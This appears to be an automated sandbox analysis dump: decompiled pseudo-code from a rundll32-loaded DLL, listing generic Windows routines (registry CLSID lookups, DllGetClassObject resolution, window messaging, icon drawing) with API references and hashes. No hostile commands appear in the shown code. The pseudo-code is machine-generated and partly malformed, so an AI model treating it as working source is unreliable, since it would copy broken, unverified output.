                                                                                                        					if(_t28 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					_t52 = _t52 + 4;
                                                                                                        					__eflags =  *((intOrPtr*)(_t55 + 0x14)) - 0x80000000;
                                                                                                        					if( *((intOrPtr*)(_t55 + 0x14)) != 0x80000000) {
                                                                                                        						L5:
                                                                                                        						E1002FA8E(_t44, _t50, _t55 - 0x10, _t28,  *((intOrPtr*)(_t55 + 0xc)),  *((intOrPtr*)(_t55 + 0x10)));
                                                                                                        						__eflags =  *((intOrPtr*)(_t55 + 0x14)) - 0x80000000;
                                                                                                        						_t31 =  *((intOrPtr*)(_t55 - 0x10));
                                                                                                        						if(__eflags != 0) {
                                                                                                        							L7:
                                                                                                        							E10035A58(_t50, __eflags, _t31);
                                                                                                        						} else {
                                                                                                        							__eflags =  *((intOrPtr*)(_t31 - 0xc));
                                                                                                        							if(__eflags != 0) {
                                                                                                        								goto L7;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						__eflags =  *_t28;
                                                                                                        						if( *_t28 != 0) {
                                                                                                        							goto L5;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        				E1001BF1F(_t55 - 0x18);
                                                                                                        				E10001280( *((intOrPtr*)(_t55 - 0x1c)) + 0xfffffff0, _t50);
                                                                                                        				E10001280( *((intOrPtr*)(_t55 - 0x10)) + 0xfffffff0, _t50);
                                                                                                        				return E1003EF21(1);
                                                                                                        			}

                                                                                                        0x100353ae
                                                                                                        0x100353ae
                                                                                                        0x100353b0
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x100353b0
                                                                                                        0x100353ac
                                                                                                        0x100353de
                                                                                                        0x100353e9
                                                                                                        0x100353f4
                                                                                                        0x10035401

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1003534E
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000000,CLSID,00000000,00020019,?,00000000,00000000,00000010,1003590D,?,?,0000000A,80000000,?,?,00000000), ref: 10035391
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Open
                                                                                                        • String ID: CLSID
                                                                                                        • API String ID: 94179280-910414637
                                                                                                        • Opcode ID: 3747742e98e0832e072cf47596f240dd66994904a58316c325aa28d759c74e59
                                                                                                        • Instruction ID: fb46be3d87864f91fab00e6d188ff4d588df7d0bfba1a2f045feac1d4d1e9e84
                                                                                                        • Opcode Fuzzy Hash: 3747742e98e0832e072cf47596f240dd66994904a58316c325aa28d759c74e59
                                                                                                        • Instruction Fuzzy Hash: D7216075D0124ADFDB02DFE4C8819EF77B9EF04392F10052AF512AB291DB75AA44CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002F811(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                        				void* _t21;
                                                                                                        				struct HINSTANCE__* _t25;
                                                                                                        				_Unknown_base(*)()* _t26;
                                                                                                        				void* _t29;
                                                                                                        				signed int* _t48;
                                                                                                        				void* _t49;
                                                                                                        				void* _t50;
                                                                                                        
                                                                                                        				_t44 = __edx;
                                                                                                        				_push(4);
                                                                                                        				E1003EE82(0x10055c09, __ebx, __edi, __esi);
                                                                                                        				_t48 =  *(_t50 + 0x10);
                                                                                                        				 *_t48 =  *_t48 & 0x00000000;
                                                                                                        				E1002F784(__ebx, __edx, __edi, _t50 - 0x10,  *((intOrPtr*)(_t50 + 8)));
                                                                                                        				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
                                                                                                        				_t21 = E10007F7E();
                                                                                                        				_t35 = _t50 + 0x10;
                                                                                                        				E10001DB0(_t50 + 0x10, _t21);
                                                                                                        				 *(_t50 - 4) = 1;
                                                                                                        				if(E1002F197( *((intOrPtr*)(_t50 - 0x10)), _t50 + 0x10) != 0) {
                                                                                                        					_t46 =  *(_t50 + 0x10);
                                                                                                        					_push( *(_t50 + 0x10));
                                                                                                        					_t25 = E1000CF67(__ebx, _t35,  *(_t50 + 0x10), _t48, __eflags);
                                                                                                        					__eflags = _t25;
                                                                                                        					if(_t25 != 0) {
                                                                                                        						_t26 = GetProcAddress(_t25, "DllGetClassObject");
                                                                                                        						__eflags = _t26;
                                                                                                        						if(_t26 == 0) {
                                                                                                        							_t49 = 0x800401f9;
                                                                                                        						} else {
                                                                                                        							_t49 =  *_t26( *((intOrPtr*)(_t50 + 8)),  *((intOrPtr*)(_t50 + 0xc)), _t48);
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						_t49 = 0x80040154;
                                                                                                        					}
                                                                                                        					E10001280(_t46 - 0x10, _t44);
                                                                                                        					E10001280( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, _t44);
                                                                                                        					_t29 = _t49;
                                                                                                        				} else {
                                                                                                        					E10001280( &(( *(_t50 + 0x10))[0xfffffffffffffffc]), _t44);
                                                                                                        					E10001280( *((intOrPtr*)(_t50 - 0x10)) + 0xfffffff0, _t44);
                                                                                                        					_t29 = 0x80040154;
                                                                                                        				}
                                                                                                        				return E1003EF21(_t29);
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1002F818
                                                                                                          • Part of subcall function 1002F784: _swprintf.LIBCMT ref: 1002F7EA
                                                                                                          • Part of subcall function 1002F197: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 1002F1CF
                                                                                                          • Part of subcall function 1002F197: RegOpenKeyA.ADVAPI32(?,?,?), ref: 1002F1E3
                                                                                                          • Part of subcall function 1002F197: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 1002F1FE
                                                                                                          • Part of subcall function 1002F197: RegQueryValueExA.ADVAPI32(?,100630E0,00000000,?,?,?), ref: 1002F218
                                                                                                          • Part of subcall function 1002F197: RegCloseKey.ADVAPI32(?), ref: 1002F228
                                                                                                          • Part of subcall function 1002F197: RegCloseKey.ADVAPI32(?), ref: 1002F22D
                                                                                                          • Part of subcall function 1002F197: RegCloseKey.ADVAPI32(?), ref: 1002F232
                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetClassObject,00000000,00000004,1002F8F1,?,10061C90,00000000), ref: 1002F8A8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen$AddressH_prolog3ProcQueryValue_swprintf
                                                                                                        • String ID: DllGetClassObject
                                                                                                        • API String ID: 2239898804-1075368562
                                                                                                        • Opcode ID: 8b70eba10d805db1dccae6f450fe3e4f62e0ad0a9677ed5200ec260016c76068
                                                                                                        • Instruction ID: 7d584b9490b15b981f5dc21b1d9290b8b4b9f252c987884c33fde78667bb7070
                                                                                                        • Opcode Fuzzy Hash: 8b70eba10d805db1dccae6f450fe3e4f62e0ad0a9677ed5200ec260016c76068
                                                                                                        • Instruction Fuzzy Hash: 21118F3950025AABDB00EFE4CC01AFEB764EF443E4F54062CF921AB291DF30A92497A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10037E90(void* __ecx, void* __eflags, intOrPtr _a4, signed int _a8) {
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				intOrPtr _v48;
                                                                                                        				void* _v52;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t26;
                                                                                                        				intOrPtr _t32;
                                                                                                        				void* _t36;
                                                                                                        				signed int _t37;
                                                                                                        				void* _t40;
                                                                                                        				intOrPtr _t41;
                                                                                                        				signed int _t42;
                                                                                                        				void* _t43;
                                                                                                        
                                                                                                        				_t39 = __ecx;
                                                                                                        				_t43 = __ecx;
                                                                                                        				_t26 = E1000AB4C(_t36, __ecx, _t40, __ecx, __eflags);
                                                                                                        				_t41 =  *((intOrPtr*)(_t26 + 0x3c));
                                                                                                        				if(_a4 != 0) {
                                                                                                        					_t42 = _a8;
                                                                                                        					__eflags =  *(__ecx + 0x3c) & _t42;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						 *((intOrPtr*)(E1000AB19(_t36, _t42, __ecx, __eflags) + 0x38)) = 0x10037e80;
                                                                                                        						_t24 = _t43 + 0x3c;
                                                                                                        						 *_t24 =  *(_t43 + 0x3c) | _t42;
                                                                                                        						__eflags =  *_t24;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					_t37 = _a8;
                                                                                                        					if(( *(__ecx + 0x3c) & _t37) != 0) {
                                                                                                        						_t49 =  *((intOrPtr*)(_t26 + 0x40)) - __ecx;
                                                                                                        						if( *((intOrPtr*)(_t26 + 0x40)) == __ecx) {
                                                                                                        							E1000D197(_t39, _t49, 1);
                                                                                                        						}
                                                                                                        						if(_t41 != 0 &&  *(_t41 + 0x20) != 0) {
                                                                                                        							E1003E9B0(_t41,  &_v52, 0, 0x30);
                                                                                                        							_t32 =  *((intOrPtr*)(_t43 + 0x20));
                                                                                                        							_v44 = _t32;
                                                                                                        							_v40 = _t32;
                                                                                                        							_v52 = 0x28;
                                                                                                        							_v48 = 1;
                                                                                                        							SendMessageA( *(_t41 + 0x20), 0x405, 0,  &_v52);
                                                                                                        						}
                                                                                                        						 *(_t43 + 0x3c) =  *(_t43 + 0x3c) &  !_t37;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return 1;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 10037ECF
                                                                                                        • SendMessageA.USER32 ref: 10037EFC
                                                                                                          • Part of subcall function 1000D197: SendMessageA.USER32 ref: 1000D1B7
                                                                                                          • Part of subcall function 1000D197: GetKeyState.USER32 ref: 1000D1CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$State_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 930327405-3887548279
                                                                                                        • Opcode ID: 6aee1d976bf16fe924a29216daac6e2f71c86c44a97ff5b34455909ed0167a95
                                                                                                        • Instruction ID: 4d5724259ee9609962e24001b4df4018e44fe8d5b9b4689e79abb7c5e21a5655
                                                                                                        • Opcode Fuzzy Hash: 6aee1d976bf16fe924a29216daac6e2f71c86c44a97ff5b34455909ed0167a95
                                                                                                        • Instruction Fuzzy Hash: 8211A735900304AFD762DFA1D881B8AB7F4FF04752F11452AE5496B682D7B1E800CF64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E100270E6(void* __ecx) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v16;
                                                                                                        				char _v18;
                                                                                                        				char _v280;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t11;
                                                                                                        				long _t14;
                                                                                                        				intOrPtr _t15;
                                                                                                        				char* _t18;
                                                                                                        				intOrPtr _t21;
                                                                                                        				intOrPtr _t33;
                                                                                                        				signed int _t36;
                                                                                                        
                                                                                                        				_t11 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t11 ^ _t36;
                                                                                                        				_t35 = 0x104;
                                                                                                        				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
                                                                                                        				if(_t14 == 0 || _t14 == 0x104) {
                                                                                                        					L4:
                                                                                                        					_t15 = 0;
                                                                                                        					__eflags = 0;
                                                                                                        				} else {
                                                                                                        					_t18 = PathFindExtensionA( &_v280);
                                                                                                        					_t35 = "%s.dll";
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsw");
                                                                                                        					_t32 =  &_v280;
                                                                                                        					_t41 = _t18 -  &_v280 + 7 - 0x106;
                                                                                                        					asm("movsb");
                                                                                                        					_t33 = _t33;
                                                                                                        					if(_t18 -  &_v280 + 7 > 0x106) {
                                                                                                        						goto L4;
                                                                                                        					} else {
                                                                                                        						E10025E38(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
                                                                                                        						_t15 = E10026DFF(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return E10039F21(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
                                                                                                        			}


















                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1002710C
                                                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 10027122
                                                                                                          • Part of subcall function 10025E38: _strcpy_s.LIBCMT ref: 10025E44
                                                                                                          • Part of subcall function 10026DFF: __EH_prolog3.LIBCMT ref: 10026E1E
                                                                                                          • Part of subcall function 10026DFF: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10026E3F
                                                                                                          • Part of subcall function 10026DFF: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026E50
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(?), ref: 10026E86
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(?), ref: 10026E8E
                                                                                                          • Part of subcall function 10026DFF: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10026EA2
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(?), ref: 10026EC6
                                                                                                          • Part of subcall function 10026DFF: ConvertDefaultLocale.KERNEL32(000003FF), ref: 10026ECC
                                                                                                          • Part of subcall function 10026DFF: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10026F05
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
                                                                                                        • String ID: %s.dll
                                                                                                        • API String ID: 3444012488-3668843792
                                                                                                        • Opcode ID: 80b707b738ec157545c5c13e6dacbb66e6d8939c01ed30b767a5e140996c9d8e
                                                                                                        • Instruction ID: 384c36ff4a710e52d999548e7966680b7d81728ab1ab625db8d3a649f26a0346
                                                                                                        • Opcode Fuzzy Hash: 80b707b738ec157545c5c13e6dacbb66e6d8939c01ed30b767a5e140996c9d8e
                                                                                                        • Instruction Fuzzy Hash: 85017971A001186FDF18EB68DD559EF73FCEF08700F4105A9E906E3240EA74AB148A51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10033268(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                        				struct tagRECT _v20;
                                                                                                        				int _t25;
                                                                                                        				void* _t42;
                                                                                                        
                                                                                                        				_t42 = __ecx;
                                                                                                        				 *(__ecx + 0x5c) =  *(__ecx + 0x5c) | 0xffffffff;
                                                                                                        				 *((intOrPtr*)(__ecx + 0x60)) = _a4;
                                                                                                        				 *((intOrPtr*)(__ecx + 0x64)) = _a8;
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && (E10011632(__ecx) & 0x00300000) != 0) {
                                                                                                        					E1000D329(__ecx, 0, 0, 1);
                                                                                                        					E1000D329(__ecx, 1, 0, 1);
                                                                                                        					E1000D3E6(__ecx, 3, 0);
                                                                                                        				}
                                                                                                        				GetClientRect( *(_t42 + 0x20),  &_v20);
                                                                                                        				_t25 = _v20.right - _v20.left;
                                                                                                        				 *(_t42 + 0x68) = _t25;
                                                                                                        				 *((intOrPtr*)(_t42 + 0x6c)) = _v20.bottom - _v20.top;
                                                                                                        				if( *(_t42 + 0x20) != 0) {
                                                                                                        					E10032C01(_t42);
                                                                                                        					_t25 = InvalidateRect( *(_t42 + 0x20), 0, 1);
                                                                                                        				}
                                                                                                        				return _t25;
                                                                                                        			}







                                                                                                        APIs
                                                                                                        • GetClientRect.USER32 ref: 100332BD
                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 100332E7
                                                                                                          • Part of subcall function 10011632: GetWindowLongA.USER32 ref: 1001163D
                                                                                                          • Part of subcall function 1000D329: SetScrollPos.USER32 ref: 1000D34E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$ClientInvalidateLongScrollWindow
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 2076638976-440804003
                                                                                                        • Opcode ID: 054f6d390cf0081b8b24c2422c7d83862ba5f4fab520aa5eaa3fd9d11cb29cc2
                                                                                                        • Instruction ID: 9c3d965ad4d931dcb600be09aa1e2d4bf4f670b0e7d40ed63a4842e0c47abf58
                                                                                                        • Opcode Fuzzy Hash: 054f6d390cf0081b8b24c2422c7d83862ba5f4fab520aa5eaa3fd9d11cb29cc2
                                                                                                        • Instruction Fuzzy Hash: B6113035A00714AFDB25DB69C845AAFF7F9FF84B50F00461EF492A6290DBB1AA40CB51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 51%
                                                                                                        			E10012BAD(void* __ecx, void* __edi) {
                                                                                                        				signed short _v16;
                                                                                                        				signed short _v20;
                                                                                                        				char _v24;
                                                                                                        				void* __ebx;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t7;
                                                                                                        				void* _t18;
                                                                                                        				intOrPtr* _t19;
                                                                                                        				void* _t24;
                                                                                                        				signed int _t25;
                                                                                                        
                                                                                                        				_t7 =  *0x10071880; // 0xffffffff
                                                                                                        				_t32 = _t7 - 0xffffffff;
                                                                                                        				if(_t7 != 0xffffffff) {
                                                                                                        					return _t7;
                                                                                                        				}
                                                                                                        				_push(_t18);
                                                                                                        				_push(_t24);
                                                                                                        				_t19 = GetProcAddress(E1000E343( *((intOrPtr*)( *((intOrPtr*)(E1000AB19(_t18, __edi, _t24, _t32) + 0x78))))), "DllGetVersion");
                                                                                                        				_t25 = 0x40000;
                                                                                                        				if(_t19 != 0) {
                                                                                                        					E1003E9B0(__edi,  &_v24, 0, 0x14);
                                                                                                        					_push( &_v24);
                                                                                                        					_v24 = 0x14;
                                                                                                        					if( *_t19() >= 0) {
                                                                                                        						_t25 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				 *0x10071880 = _t25;
                                                                                                        				return _t25;
                                                                                                        			}















                                                                                                        APIs
                                                                                                          • Part of subcall function 1000E343: GetModuleHandleA.KERNEL32(?,00000000,10012BCE,00000000,00000000,100046B4,B5E27FEF,?,?,00000000,100045E5,?,B5E27FEF), ref: 1000E34F
                                                                                                          • Part of subcall function 1000E343: LoadLibraryA.KERNEL32(?,?,?,00000000,100045E5,?,B5E27FEF), ref: 1000E35F
                                                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion,00000000,00000000,100046B4,B5E27FEF,?,?,00000000,100045E5,?,B5E27FEF), ref: 10012BD4
                                                                                                        • _memset.LIBCMT ref: 10012BED
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc_memset
                                                                                                        • String ID: DllGetVersion
                                                                                                        • API String ID: 3385804498-2861820592
                                                                                                        • Opcode ID: 4438af943961bb3b9e91a039a70a94ab490cd7bf61670a402e56abf6f2750ece
                                                                                                        • Instruction ID: ca3adb3662c6778137da144dfec51b1eda58001eaa43a4a95b79cef36846b6d4
                                                                                                        • Opcode Fuzzy Hash: 4438af943961bb3b9e91a039a70a94ab490cd7bf61670a402e56abf6f2750ece
                                                                                                        • Instruction Fuzzy Hash: 32F031B1E002259AE740EBACDC85B9E73E8EB04794F510261EA14F71D2E774DE9487A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 83%
                                                                                                        			E10029831(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, struct HWND__* _a4, intOrPtr _a8) {
                                                                                                        				signed int _v8;
                                                                                                        				char _v20;
                                                                                                        				void* __esi;
                                                                                                        				signed int _t7;
                                                                                                        				signed int _t16;
                                                                                                        				intOrPtr _t18;
                                                                                                        				intOrPtr _t23;
                                                                                                        				intOrPtr _t24;
                                                                                                        				struct HWND__* _t25;
                                                                                                        				signed int _t26;
                                                                                                        
                                                                                                        				_t24 = __edi;
                                                                                                        				_t23 = __edx;
                                                                                                        				_t18 = __ebx;
                                                                                                        				_t7 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t7 ^ _t26;
                                                                                                        				_t25 = _a4;
                                                                                                        				if(_t25 != 0) {
                                                                                                        					if((GetWindowLongA(_t25, 0xfffffff0) & 0x0000000f) != _a8) {
                                                                                                        						goto L1;
                                                                                                        					} else {
                                                                                                        						GetClassNameA(_t25,  &_v20, 0xa);
                                                                                                        						_t16 = E1000D035( &_v20, "combobox");
                                                                                                        						asm("sbb eax, eax");
                                                                                                        						_t11 =  ~_t16 + 1;
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					L1:
                                                                                                        					_t11 = 0;
                                                                                                        				}
                                                                                                        				return E10039F21(_t11, _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • GetWindowLongA.USER32 ref: 10029850
                                                                                                        • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029865
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClassLongNameWindow
                                                                                                        • String ID: combobox
                                                                                                        • API String ID: 1147815241-2240613097
                                                                                                        • Opcode ID: f12ca2ce1131c6aed5cfad8a27d5ddc0fe4ef1f764689a8bcd09fd7b0149b3ca
                                                                                                        • Instruction ID: 7cd22905bc921d95dbbf7a6d00d167587a0338e7e177b58db4d5b0897e1d3b99
                                                                                                        • Opcode Fuzzy Hash: f12ca2ce1131c6aed5cfad8a27d5ddc0fe4ef1f764689a8bcd09fd7b0149b3ca
                                                                                                        • Instruction Fuzzy Hash: B7F0B43161012AAFDB01EF64CC85EAE73A8EF06294B940626E851E7080DA30FA0587A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10032803(intOrPtr __ebx, char __ecx, intOrPtr __edx, intOrPtr __edi, void* __eflags) {
                                                                                                        				signed int _v8;
                                                                                                        				struct HDC__* _v88;
                                                                                                        				char _v92;
                                                                                                        				struct tagRECT _v108;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t19;
                                                                                                        				intOrPtr _t36;
                                                                                                        				char _t38;
                                                                                                        				signed int _t39;
                                                                                                        
                                                                                                        				_t40 = __eflags;
                                                                                                        				_t36 = __edx;
                                                                                                        				_t19 =  *0x10072650; // 0xb5e27fef
                                                                                                        				_v8 = _t19 ^ _t39;
                                                                                                        				_t38 = __ecx;
                                                                                                        				E10009120(__ebx,  &_v92, __edi, __ecx, __eflags);
                                                                                                        				GetClientRect( *(_t38 + 0x20),  &_v108);
                                                                                                        				_v108.left = _v108.left + 1;
                                                                                                        				_v108.top = _v108.top + 1;
                                                                                                        				_v108.right = _v108.right - 1;
                                                                                                        				_v108.bottom = _v108.bottom - 1;
                                                                                                        				E100325BA( &_v92,  &_v108);
                                                                                                        				DrawIcon(_v88, 0, 0,  *(_t38 + 0x74));
                                                                                                        				return E10039F21(E10009174(__ebx,  &_v92, __edi, _t38, _t40), __ebx, _v8 ^ _t39, _t36, __edi, _t38, __ecx);
                                                                                                        			}














                                                                                                        APIs
                                                                                                          • Part of subcall function 10009120: __EH_prolog3.LIBCMT ref: 10009127
                                                                                                          • Part of subcall function 10009120: BeginPaint.USER32(?,?,00000004,1003281F), ref: 10009153
                                                                                                        • GetClientRect.USER32 ref: 10032826
                                                                                                          • Part of subcall function 100325BA: Ellipse.GDI32(?,?,?,?,?), ref: 100325CC
                                                                                                        • DrawIcon.USER32 ref: 1003284E
                                                                                                          • Part of subcall function 10009174: __EH_prolog3.LIBCMT ref: 1000917B
                                                                                                          • Part of subcall function 10009174: EndPaint.USER32(?,?,00000004,1003285C), ref: 10009196
                                                                                                        Strings
                                                                                                        Memory Dump Source
